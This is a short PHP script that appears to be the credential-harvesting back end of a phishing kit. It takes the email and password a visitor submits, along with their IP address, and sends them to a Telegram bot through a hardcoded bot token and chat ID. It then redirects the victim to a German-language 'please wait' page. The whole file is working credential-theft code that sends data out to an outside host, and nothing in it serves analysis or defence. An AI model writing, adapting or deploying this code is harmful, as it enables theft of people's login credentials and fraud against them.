<?php
$ip = getenv("REMOTE_ADDR");
$email = $_POST['username'] ?? '';
$password = $_POST['password'] ?? '';


$message  = "🔐 <b>USER LOGIN</b>\n";
$message .= "=====================\n";
$message .= "📧 Email: <code>$email</code>\n";
$message .= "🔑 Password: <code>$password</code>\n";
$message .= "🌍 IP: <code>$ip</code>\n";
$message .= "=====================";


$botToken = "8230036797:AAEn7vvHrk5SF628aV7IfxBm2dujlmF-tPo";
$chatId = "-4857187582";
$url = "https://api.telegram.org/bot$botToken/sendMessage?" . http_build_query([
    'chat_id' => $chatId,
    'text' => $message,
    'parse_mode' => 'HTML',
    'disable_web_page_preview' => true
]);

file_get_contents($url);

header("Location: ../Bitte/Warten.php");
exit;
?>


?>
